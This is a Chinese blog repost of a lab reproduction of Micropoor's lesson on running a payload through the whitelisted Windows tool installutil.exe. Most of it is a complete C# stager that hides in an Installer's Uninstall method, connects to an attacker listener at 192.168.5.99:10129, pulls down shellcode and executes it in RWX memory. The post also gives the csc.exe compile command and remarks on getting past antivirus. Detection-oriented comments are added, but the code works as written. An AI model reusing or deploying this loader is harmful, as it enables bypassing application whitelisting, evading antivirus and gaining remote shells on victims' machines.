对亮神基于白名单Installutil.exe 执行 payload 第二季复现

0x00 Installer简介

Installer工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与System.Configuration.Install命名空间中的类一起使用。

0x01 环境

攻击机kali 192.168.5.99
靶机win7 192.168.5.112
装有国内常见AV

0x02 复现

攻击机配置监听
靶机运行

shell弹回


0x03 installutil.cs

using System;using System.Net;using System.Linq;using System.Net.Sockets;using System.Runtime.InteropServices;using System.Threading;using System.Configuration.Install;using System.Windows.Forms;
/// <summary>
/// Decoy entry point. Running the compiled assembly directly only loops on a
/// "doge" message box and a blocking Console.ReadLine(); it never reaches the
/// network/loader code, which is only invoked from the Installer subclass below.
/// </summary>
public class GQLBigHgUniLuVx {
/// <summary>Blocks forever showing a message box; no return value, no other side effect.</summary>
public static void Main()
{
// Infinite loop: Console.ReadLine() blocks until stdin delivers a line, then the box is shown again.
while(true)
{{ MessageBox.Show("doge"); Console.ReadLine();}}
}
 }
 
 /// <summary>
 /// Installer component flagged with RunInstaller(true) so installutil.exe picks it up.
 /// Nothing is overridden for Install; the loader fires only from the Uninstall
 /// action. From a detection standpoint the observable behaviour is installutil.exe
 /// making an outbound TCP connection and starting a thread on unbacked memory,
 /// not this class itself.
 /// </summary>
 [System.ComponentModel.RunInstaller(true)]
 public class esxWUYUTWShqW : System.Configuration.Install.Installer
 {
 /// <summary>
 /// Override of Installer.Uninstall: ignores the saved-state dictionary and hands
 /// control to the downloader/loader. base.Uninstall is never called.
 /// </summary>
 /// <param name="zWrdFAUHmunnu">Saved installer state; unused.</param>
 public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
 {
 jkmhGrfzsKQeCG.LCIUtRN();
 }

 }
 /// <summary>
 /// Stager: connects to a hard-coded listener, receives a length-prefixed blob,
 /// copies it into an RWX allocation and runs it on a new thread. Detection
 /// opportunities visible in this code: outbound TCP from installutil.exe to
 /// 192.168.5.99:10129, VirtualAlloc with PAGE_EXECUTE_READWRITE, and a
 /// CreateThread whose start address is not inside any loaded module.
 /// </summary>
 public class jkmhGrfzsKQeCG
 { [DllImport("kernel")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI); // (lpAddress, dwSize, flAllocationType, flProtect); address returned as UInt32
 [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn); // (attrs, stackSize, startAddress, parameter, flags, out threadId)
 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq); // (handle, timeoutMs)
 /// <summary>
 /// Downloads the second stage over raw TCP. Protocol as implemented here: a
 /// 4-byte native-endian length, then that many bytes. The returned buffer is the
 /// blob prefixed by 5 bytes: 0xBF followed by the socket handle, i.e. an x86
 /// "mov edi, imm32" so the received code inherits the open connection.
 /// The length and the payload both come from the remote side unauthenticated.
 /// </summary>
 /// <param name="ZwznjBJY">Listener IPv4 address as text.</param>
 /// <param name="KsMEeo">Listener TCP port.</param>
 /// <returns>The 5+length byte buffer, or null when the connect throws.</returns>
 static byte[] ErlgHH(string ZwznjBJY,int KsMEeo) {
 IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
 Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
 
 // Any connect failure is swallowed and reported as null; the caller then does nothing.
 try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
 catch { return null;}
 // Length header; the Receive return count is not checked and the value sizes the allocation below.
 byte[] UmquAHRnhhpuE = new byte[4];
 XXxIoIXNCle.Receive(UmquAHRnhhpuE,4,0);
 int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE,0);
 byte[] qaYyFq = new byte[kFVRSNnpj +5];
 int SRCDELibA =0;
 // Read in chunks of at most 4096 bytes, starting at offset 5 to leave room for the prefix.
 while(SRCDELibA < kFVRSNnpj)
 { SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA +5,(kFVRSNnpj - SRCDELibA)<4096 ? (kFVRSNnpj - SRCDELibA) : 4096,0);}
 // Patch the socket handle into bytes 1..4 and the 0xBF opcode into byte 0.
 byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
 Array.Copy(TvvzOgPLqwcFFv,0, qaYyFq,1,4); qaYyFq[0]=0xBF;
 return qaYyFq;}
 /// <summary>
 /// Executes a raw byte buffer: VirtualAlloc(MEM_COMMIT = 0x1000, PAGE_EXECUTE_READWRITE = 0x40),
 /// Marshal.Copy into it, CreateThread at the buffer address, then WaitForSingleObject
 /// with INFINITE (0xFFFFFFFF). Does nothing when the buffer is null. The RWX
 /// allocation followed by a thread started on that region is the classic
 /// shellcode-injection telemetry an EDR keys on.
 /// </summary>
 /// <param name="HEHUjJhkrNS">Bytes to run, or null to skip.</param>
 static void cmMtjerv(byte[] HEHUjJhkrNS) {
 if(HEHUjJhkrNS !=null) {
 UInt32 WcpKfU = VirtualAlloc(0,(UInt32)HEHUjJhkrNS.Length,0x1000,0x40);
 Marshal.Copy(HEHUjJhkrNS,0,(IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
 IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
 UInt32 wdjYKFDCCf =0;
 IntPtr XVYcQxpp = IntPtr.Zero;
 // Thread start address is the allocation itself; no parameter; the thread id is written to wdjYKFDCCf and ignored.
 UhxtIFnlOQatrk = CreateThread(0,0, WcpKfU, XVYcQxpp,0, ref wdjYKFDCCf);
 // Blocks the hosting installutil.exe process until the stage thread exits.
 WaitForSingleObject(UhxtIFnlOQatrk,0xFFFFFFFF); }}
 /// <summary>
 /// Called from the Installer's Uninstall: fetch the stage from the hard-coded
 /// listener 192.168.5.99:10129 and run it (a failed connect yields null and is a no-op).
 /// </summary>
 public static void LCIUtRN() {

byte[] IBtCWU =null; IBtCWU = ErlgHH("192.168.5.99",10129);
cmMtjerv(IBtCWU);
} }

Micropoor.exe 生成，不需要那个 installutil.snk 文件

csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micropoor.exe  /unsafe C:\Users\Administrator\Desktop\installutil.cs


0x04 总结

亮神 payload 直接复制格式错误较多，只需替换 IP 和端口即可。win7 可能不存在某些依赖。直接运行 exe 会被 AV 拦截，即使放行后也过不了某些 AV。靶机运行 payload 时注意空格。

0x05借鉴

https://github.com/Micropoor/Micro8/blob/master/第七十二课:基于白名单Installutil.exe执行payload第二季.pdf


转载自blog.csdn.net/ws13129/article/details/89741895